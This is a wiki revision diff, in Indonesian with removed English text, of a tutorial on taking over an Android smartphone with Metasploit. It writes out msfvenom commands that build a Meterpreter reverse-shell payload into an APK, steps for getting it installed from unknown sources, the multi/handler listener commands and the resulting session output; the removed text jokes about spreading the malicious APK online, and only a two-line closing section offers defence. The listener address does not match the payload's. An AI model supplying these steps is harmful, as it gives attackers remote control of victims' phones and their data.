Difference between revisions of "MSF: meterpreter untuk attack android"

From OnnoWiki
Jump to navigation Jump to search
 
(4 intermediate revisions by the same user not shown)
Line 1: Line 1:
 
sumber: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.7S1EA8SV.dpbs
 
sumber: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.7S1EA8SV.dpbs
  
Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast.
 
  
What is android? according to wikipedia:
+
==Apakah Android?==
  
    Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
+
Android adalah sistem operasi berbasis kernel Linux, dan dirancang terutama untuk perangkat mobile touchscreen seperti smartphone dan komputer tablet. Awalnya dikembangkan oleh Android, Inc., yang didukung Google secara finansial dan kemudian dibeli pada tahun 2005, Android diresmikan pada tahun 2007 bersamaan dengan berdirinya Open Handset Alliance: sebuah konsorsium perangkat keras, perangkat lunak, dan perusahaan telekomunikasi yang ditujukan untuk meningkatkan standar terbuka untuk seluler.
  
and what is APK? according to wikipedia:
+
==Apakah APK?==
  
    Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.
+
File paket aplikasi Android (APK) adalah format file yang digunakan untuk mendistribusikan dan menginstal perangkat lunak aplikasi dan middleware ke sistem operasi Google Android; Sangat mirip dengan paket MSI di Windows atau paket Deb pada sistem operasi berbasis Debian seperti Ubuntu.
  
 
==Skenario Serangan==
 
==Skenario Serangan==
  
* Attacker IP address: 192.168.8.94
+
* Attacker IP address: 192.168.0.104
* Attacker port to receive connection: 443
+
* Attacker port to receive connection: 4895
  
 
==Kebutuhan==
 
==Kebutuhan==
  
* Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
+
* Metasploit framework (menggunakan Kali Linux 2016.2)
* Android smartphone (we use HTC One android 4.4 KitKat)
+
* Android smartphone
  
 
==Membuat exploit==
 
==Membuat exploit==
  
* Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.
+
* Di CLI Kali Linux, ketik
* We will utilize Metasploit payload framework to create exploit for this tutorial.
 
  
  msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
+
  msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> > hack.apk
 +
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895 > hack.apk
  
As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command
 
  
Hacking Android Smartphone Tutorial using Metasploit
+
Akan keluar kira-kira
  
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.
+
No platform was selected, choosing Msf::Module::Platform::Android from the payload
 +
No Arch selected, selecting Arch: dalvik from the payload
 +
No encoder or badchars specified, outputting raw payload
 +
Payload size: 8784 bytes
  
Hacking Android Smartphone Tutorial using Metasploit
 
  
Info:
+
==Download apk di SmartPhone==
  
use exploit/multi/handler –> we will use Metasploit handler
+
* Download apk
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
+
* Setting, contreng Install from "unknown source".
 +
* Install & jalankan apk tersebut di smartphone.
  
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
+
==Setelah .apk di jalankan==
  
Hacking Android Smartphone Tutorial using Metasploit
+
* Di CLI Kali Linux
  
Info:
+
msfconsole
  
set lhost 192.168.8.94 –> attacker IP address
+
* Jalankan exploit
set lport 443 –> port to listen the reverse connection
 
exploit –> start to listen incoming connection
 
  
5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution 🙂 ).
+
use exploit/multi/handler
 +
set payload android/meterpreter/reverse_tcp
 +
set lhost 192.168.0.209
 +
set lport 443
 +
exploit
  
6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:
+
Akan keluar
  
Hacking Android Smartphone Tutorial using Metasploit
+
[*] Started reverse TCP handler on 192.168.0.209:443
 +
[*] Starting the payload handler...
  
7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.
+
Jika ada sambungan dari smartphone,
 
 
Hacking Android Smartphone Tutorial using Metasploit
 
 
 
See the video below if you are not clear about the step by step Hacking Android Smartphone Tutorial using Metasploit above:
 
 
 
Conclusion:
 
 
 
1. Don't install APK's from the unknown source.
 
 
 
2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in this tutorial.
 
 
 
Hacking Android Smartphone Tutorial using Metasploit
 
 
 
Share this post if you found it useful 🙂
 
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.7S1EA8SV.dpuf
 
  
 +
[*] Sending stage (67614 bytes) to 192.168.0.157
 +
[*] Meterpreter session 1 opened (192.168.0.209:443 -> 192.168.0.157:35391) at 2017-06-01 05:44:49 +0700
 +
 +
meterpreter >
  
 +
==Solusi==
  
 +
* Jangan install APK dari "unknown source"
 +
* Kalau terpaksa juga, pastikan apk tersebut bersih.
  
  

Latest revision as of 12:24, 1 June 2017

sumber: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.7S1EA8SV.dpbs


Apakah Android?

Android adalah sistem operasi berbasis kernel Linux, dan dirancang terutama untuk perangkat mobile touchscreen seperti smartphone dan komputer tablet. Awalnya dikembangkan oleh Android, Inc., yang didukung Google secara finansial dan kemudian dibeli pada tahun 2005, Android diresmikan pada tahun 2007 bersamaan dengan berdirinya Open Handset Alliance: sebuah konsorsium perangkat keras, perangkat lunak, dan perusahaan telekomunikasi yang ditujukan untuk meningkatkan standar terbuka untuk seluler.

Apakah APK?

File paket aplikasi Android (APK) adalah format file yang digunakan untuk mendistribusikan dan menginstal perangkat lunak aplikasi dan middleware ke sistem operasi Google Android; Sangat mirip dengan paket MSI di Windows atau paket Deb pada sistem operasi berbasis Debian seperti Ubuntu.

Skenario Serangan

  • Attacker IP address: 192.168.0.104
  • Attacker port to receive connection: 4895

Kebutuhan

  • Metasploit framework (menggunakan Kali Linux 2016.2)
  • Android smartphone

Membuat exploit

  • Di CLI Kali Linux, ketik
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> > hack.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895 > hack.apk


Akan keluar kira-kira

No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8784 bytes


Download apk di SmartPhone

  • Download apk
  • Setting, contreng Install from "unknown source".
  • Install & jalankan apk tersebut di smartphone.

Setelah .apk di jalankan

  • Di CLI Kali Linux
msfconsole
  • Jalankan exploit
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.209
set lport 443
exploit

Akan keluar

[*] Started reverse TCP handler on 192.168.0.209:443 
[*] Starting the payload handler...

Jika ada sambungan dari smartphone,

[*] Sending stage (67614 bytes) to 192.168.0.157
[*] Meterpreter session 1 opened (192.168.0.209:443 -> 192.168.0.157:35391) at 2017-06-01 05:44:49 +0700

meterpreter >

Solusi

  • Jangan install APK dari "unknown source"
  • Kalau terpaksa juga, pastikan apk tersebut bersih.


Referensi